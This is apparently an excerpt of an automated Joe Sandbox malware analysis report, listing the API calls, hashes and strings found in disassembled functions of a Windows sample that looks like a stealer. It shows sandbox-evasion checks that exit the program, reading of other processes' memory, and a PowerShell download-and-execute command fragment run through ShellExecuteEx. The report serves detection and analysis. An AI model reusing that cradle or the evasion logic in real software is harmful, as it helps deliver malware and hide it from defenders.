                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                                  • String ID:
                                                  • API String ID: 2623679115-0
                                                  • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                  • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                                  • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                  • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                                  APIs
                                                  • strtok_s.MSVCRT ref: 00413588
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • strtok_s.MSVCRT ref: 004136D1
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00849958,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpystrtok_s$lstrlen
                                                  • String ID:
                                                  • API String ID: 3184129880-0
                                                  • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                  • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                                  • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                  • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                                  APIs
                                                  • __lock.LIBCMT ref: 0041B39A
                                                    • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                                    • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                                    • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                                  • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                                    • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                                  • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 2005412495-0
                                                  • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                  • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                                  • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                  • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                                  APIs
                                                    • Part of subcall function 00B49AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00B49B08
                                                    • Part of subcall function 00B49AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00B49B21
                                                    • Part of subcall function 00B49AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00B49B39
                                                    • Part of subcall function 00B49AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00B49B51
                                                    • Part of subcall function 00B49AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00B49B6A
                                                    • Part of subcall function 00B49AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00B49B82
                                                    • Part of subcall function 00B49AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00B49B9A
                                                    • Part of subcall function 00B49AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00B49BB3
                                                    • Part of subcall function 00B49AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00B49BCB
                                                    • Part of subcall function 00B49AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00B49BE3
                                                    • Part of subcall function 00B49AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00B49BFC
                                                    • Part of subcall function 00B49AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00B49C14
                                                    • Part of subcall function 00B49AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00B49C2C
                                                    • Part of subcall function 00B49AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00B49C45
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B31437: ExitProcess.KERNEL32 ref: 00B31478
                                                    • Part of subcall function 00B313C7: GetSystemInfo.KERNEL32(?), ref: 00B313D1
                                                    • Part of subcall function 00B313C7: ExitProcess.KERNEL32 ref: 00B313E5
                                                    • Part of subcall function 00B31377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B31392
                                                    • Part of subcall function 00B31377: VirtualAllocExNuma.KERNEL32(00000000), ref: 00B31399
                                                    • Part of subcall function 00B31377: ExitProcess.KERNEL32 ref: 00B313AA
                                                    • Part of subcall function 00B31487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B314A5
                                                    • Part of subcall function 00B31487: __aulldiv.LIBCMT ref: 00B314BF
                                                    • Part of subcall function 00B31487: __aulldiv.LIBCMT ref: 00B314CD
                                                    • Part of subcall function 00B31487: ExitProcess.KERNEL32 ref: 00B314FB
                                                    • Part of subcall function 00B469D7: GetUserDefaultLangID.KERNEL32 ref: 00B469DB
                                                    • Part of subcall function 00B313F7: ExitProcess.KERNEL32 ref: 00B3142D
                                                    • Part of subcall function 00B47AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B3141E), ref: 00B47AE7
                                                    • Part of subcall function 00B47AB7: RtlAllocateHeap.NTDLL(00000000), ref: 00B47AEE
                                                    • Part of subcall function 00B47AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B47B06
                                                    • Part of subcall function 00B47B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B47B77
                                                    • Part of subcall function 00B47B47: RtlAllocateHeap.NTDLL(00000000), ref: 00B47B7E
                                                    • Part of subcall function 00B47B47: GetComputerNameA.KERNEL32(?,00000104), ref: 00B47B96
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B46D31
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B46D4F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00B46D60
                                                  • Sleep.KERNEL32(00001770), ref: 00B46D6B
                                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B46D81
                                                  • ExitProcess.KERNEL32 ref: 00B46D89
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 2525456742-0
                                                  • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                  • Instruction ID: 976b33761c0f6c5e4f0fc882c8fa111efb2300755cd72083432727eea952f0ad
                                                  • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                  • Instruction Fuzzy Hash: 243148B5A80208ABDB04FBF0DC56BFD77F9AF15700F1015A8F552A2192EF745B04DA62
                                                  APIs
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B39C53
                                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B39C78
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B39C98
                                                  • ReadFile.KERNEL32(000000FF,?,00000000,00B316F6,00000000), ref: 00B39CC1
                                                  • LocalFree.KERNEL32(00B316F6), ref: 00B39CF7
                                                  • CloseHandle.KERNEL32(000000FF), ref: 00B39D01
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                  • String ID:
                                                  • API String ID: 2311089104-0
                                                  • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                  • Instruction ID: 6f6951f5a7e9da43006d4f5aac81fc46be79e712d5f9d74d4d1b1a85fa9d56ef
                                                  • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                  • Instruction Fuzzy Hash: 8A311AB8A40209EFDB14CF94C895BEE77F5FF49700F209198E915A7290C774AA41CFA1
                                                  APIs
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                  • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                  • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                  • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                  • String ID:
                                                  • API String ID: 2311089104-0
                                                  • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                  • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                                  • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                  • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                                  APIs
                                                  • __getptd.LIBCMT ref: 00B4CC51
                                                    • Part of subcall function 00B4C206: __getptd_noexit.LIBCMT ref: 00B4C209
                                                    • Part of subcall function 00B4C206: __amsg_exit.LIBCMT ref: 00B4C216
                                                  • __amsg_exit.LIBCMT ref: 00B4CC71
                                                  • __lock.LIBCMT ref: 00B4CC81
                                                  • InterlockedDecrement.KERNEL32(?), ref: 00B4CC9E
                                                  • free.MSVCRT ref: 00B4CCB1
                                                  • InterlockedIncrement.KERNEL32(0042B980), ref: 00B4CCC9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                  • String ID:
                                                  • API String ID: 634100517-0
                                                  • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                  • Instruction ID: fc9fc9f00bdcab024bc0b59b05ee59217a528b44773a45f585d30a5666b56b26
                                                  • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                  • Instruction Fuzzy Hash: FE012231A43A25ABC760AB65A485B5D7FE0FF10B10F100196EC5867292C774AB81FFD9
                                                  APIs
                                                  • __getptd.LIBCMT ref: 0041C9EA
                                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                  • __amsg_exit.LIBCMT ref: 0041CA0A
                                                  • __lock.LIBCMT ref: 0041CA1A
                                                  • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                  • free.MSVCRT ref: 0041CA4A
                                                  • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                  • String ID:
                                                  • API String ID: 634100517-0
                                                  • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                  • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                                  • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                  • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                                  APIs
                                                  • strlen.MSVCRT ref: 00B47186
                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00B47401,00000000,00420BA8,00000000,00000000), ref: 00B471B4
                                                    • Part of subcall function 00B46E37: strlen.MSVCRT ref: 00B46E48
                                                    • Part of subcall function 00B46E37: strlen.MSVCRT ref: 00B46E6C
                                                  • VirtualQueryEx.KERNEL32(00B47574,00000000,?,0000001C), ref: 00B471F9
                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B47401), ref: 00B4731A
                                                    • Part of subcall function 00B47047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00B4705F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                                  • String ID: @
                                                  • API String ID: 2950663791-2766056989
                                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction ID: fa7bbb2430924855db7fad49ad09d322b73abf951a585d417b1567e23665bc9f
                                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction Fuzzy Hash: B251E4B5A04109ABDB04CF98E981AEFB7F6FF88300F148559F915A7240D734AA11EBA5
                                                  APIs
                                                  • strlen.MSVCRT ref: 00416F1F
                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                                  • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                                    • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                                  • String ID: @
                                                  • API String ID: 2950663791-2766056989
                                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID: *n@$*n@
                                                  • API String ID: 1029625771-193229609
                                                  • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                  • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                                  • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                  • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                                  APIs
                                                  • lstrcat.KERNEL32(?,0064A30C), ref: 00B44A42
                                                    • Part of subcall function 00B49047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B49072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B44A68
                                                  • lstrcat.KERNEL32(?,?), ref: 00B44A87
                                                  • lstrcat.KERNEL32(?,?), ref: 00B44A9B
                                                  • lstrcat.KERNEL32(?,0064A284), ref: 00B44AAE
                                                  • lstrcat.KERNEL32(?,?), ref: 00B44AC2
                                                  • lstrcat.KERNEL32(?,0064A2C8), ref: 00B44AD6
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B48FF7: GetFileAttributesA.KERNEL32(00000000,?,00B31DBB,?,?,0042565C,?,?,00420E1F), ref: 00B49006
                                                    • Part of subcall function 00B447D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B447E7
                                                    • Part of subcall function 00B447D7: RtlAllocateHeap.NTDLL(00000000), ref: 00B447EE
                                                    • Part of subcall function 00B447D7: wsprintfA.USER32 ref: 00B4480D
                                                    • Part of subcall function 00B447D7: FindFirstFileA.KERNEL32(?,?), ref: 00B44824
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                  • String ID:
                                                  • API String ID: 2540262943-0
                                                  • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                  • Instruction ID: 7d83847cabddaadd622299790728a25a6e3725c49e70f79343ec747ecb148c22
                                                  • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                  • Instruction Fuzzy Hash: F2317FF6940208ABCB10FBB0CC85EED73B9AB48700F4045C9B74596081EFB597899B95
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                                  Strings
                                                  • ')", xrefs: 00412CB3
                                                  • <, xrefs: 00412D39
                                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  • API String ID: 3031569214-898575020
                                                  • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                  • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                                  • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                  • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                                  APIs
